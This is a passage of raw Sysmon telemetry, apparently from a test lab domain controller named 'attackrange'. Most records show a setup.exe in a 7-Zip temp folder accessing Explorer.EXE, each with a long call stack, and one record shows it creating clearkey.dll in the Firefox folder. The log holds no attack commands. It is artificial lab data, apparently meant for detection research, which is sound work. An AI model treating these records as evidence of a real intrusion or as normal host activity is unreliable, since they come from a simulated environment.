\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015745Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015744Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015743Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015742Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015741Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015740Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015739Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll2021-01-18 13:59:52.739 10341000x800000000000000015735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.739{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 